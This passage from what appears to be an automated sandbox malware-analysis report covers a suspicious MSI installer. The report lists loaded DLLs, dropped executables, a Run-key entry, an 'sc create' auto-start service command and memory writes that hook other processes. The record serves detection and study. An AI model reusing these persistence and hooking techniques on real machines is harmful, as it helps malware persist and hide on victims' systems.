            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: msi.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD92.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: starburn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: magnification.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d9.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: slwga.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: schedcli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: security.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: olepro32.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxva2.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: idndl.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: hBqTrQLya4.msiStatic file information: File size 31124992 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: hBqTrQLya4.msi
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: MSIDD62.tmp, 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD62.tmp, 0000000C.00000000.1281513360.000000000042D000.00000002.00000001.01000000.00000004.sdmp, MSIDD92.tmp, 0000000D.00000000.1281837809.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, MSIDD92.tmp, 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp, hBqTrQLya4.msi
            Source: initial sampleStatic PE information: section where entry point is pointing to: .kC0
            Source: StarBurn.dll.2.drStatic PE information: section name: .didata
            Source: StarBurn.dll.2.drStatic PE information: section name: .ri$
            Source: StarBurn.dll.2.drStatic PE information: section name: .)5y
            Source: StarBurn.dll.2.drStatic PE information: section name: .kC0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_004081F0 push ecx; ret 12_2_00408203
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: 13_2_00D981F0 push ecx; ret 13_2_00D98203
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB794 push 00BCB82Ah; ret 14_2_00BCB822
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA3C8 push 00BCA465h; ret 14_2_00BCA45D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCADB8 push 00BCAE20h; ret 14_2_00BCAE18
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA69C push 00BCA738h; ret 14_2_00BCA730
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA48C push 00BCA542h; ret 14_2_00BCA53A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB028 push 00BCB222h; ret 14_2_00BCB21A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA570 push 00BCA5BAh; ret 14_2_00BCA5B2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCA569 push 00BCA5BAh; ret 14_2_00BCA5B2
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BCB244 push 00BCB2E3h; ret 14_2_00BCB2DB
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00964084 push ecx; mov dword ptr [esp], edx14_2_00964085
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00932050 push ecx; mov dword ptr [esp], eax14_2_00932051
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095C078 push ecx; mov dword ptr [esp], ecx14_2_0095C07C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009211A0 push ecx; mov dword ptr [esp], eax14_2_009211A1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009611F8 push ecx; mov dword ptr [esp], ecx14_2_009611FC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009A6138 push ecx; mov dword ptr [esp], edx14_2_009A613A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00919120 push 009191B9h; ret 14_2_009191B1
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00960154 push ecx; mov dword ptr [esp], edx14_2_00960155
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095F144 push ecx; mov dword ptr [esp], ecx14_2_0095F148
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00921170 push ecx; mov dword ptr [esp], eax14_2_00921171
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00960164 push ecx; mov dword ptr [esp], edx14_2_00960165
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095D160 push ecx; mov dword ptr [esp], ecx14_2_0095D164
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095A2D8 push ecx; mov dword ptr [esp], ecx14_2_0095A2DC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00959250 push ecx; mov dword ptr [esp], edx14_2_00959251
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095E3AC push ecx; mov dword ptr [esp], ecx14_2_0095E3B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095D34C push ecx; mov dword ptr [esp], ecx14_2_0095D350
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009634A4 push ecx; mov dword ptr [esp], edx14_2_009634A5
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009624A8 push ecx; mov dword ptr [esp], edx14_2_009624A9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_0095A4C4 push ecx; mov dword ptr [esp], ecx14_2_0095A4C8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_009995DC push ecx; mov dword ptr [esp], edx14_2_009995E1

            Persistence and Installation Behavior

            barindex
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIDD92.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIDD62.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\Pictures\fotosdaviagem\windows10.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD62.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID6F5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID686.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dllJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD92.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID783.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD62.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID6F5.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID754.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID7D3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID686.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDD92.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID783.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRARJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram DesktopJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windowsJump to behavior
            Source: C:\Windows\System32\msiexec.exeRegistry value created or modified: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Run windowsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto

            Hooking and other Techniques for Hiding and Protection

            barindex
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 6E0005 value: E9 8B 2F 08 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 77762F90 value: E9 7A D0 F7 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 3750005 value: E9 2B BA FD 73 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 7772BA30 value: E9 DA 45 02 8C Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 3760008 value: E9 8B 8E 01 74 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 77778E90 value: E9 80 71 FE 8B Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 3990005 value: E9 8B 4D 0A 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 75A34D90 value: E9 7A B2 F5 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 39B0005 value: E9 EB EB 09 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 75A4EBF0 value: E9 1A 14 F6 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 39C0005 value: E9 8B 8A C1 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 765D8A90 value: E9 7A 75 3E 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 39D0005 value: E9 2B 02 C3 72 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 7416 base: 76600230 value: E9 DA FD 3C 8D Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 720005 value: E9 8B 2F 04 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 77762F90 value: E9 7A D0 FB 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 740005 value: E9 2B BA FE 76 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 7772BA30 value: E9 DA 45 01 89 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 750008 value: E9 8B 8E 02 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 77778E90 value: E9 80 71 FD 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 770005 value: E9 8B 4D 2C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 75A34D90 value: E9 7A B2 D3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 780005 value: E9 EB EB 2C 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 75A4EBF0 value: E9 1A 14 D3 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 790005 value: E9 8B 8A E4 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 765D8A90 value: E9 7A 75 1B 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 7A0005 value: E9 2B 02 E6 75 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8260 base: 76600230 value: E9 DA FD 19 8A Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 700005 value: E9 8B 2F 06 77 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 77762F90 value: E9 7A D0 F9 88 Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeMemory written: PID: 8272 base: 720005 value: E9 2B BA 00 77 Jump to behavior
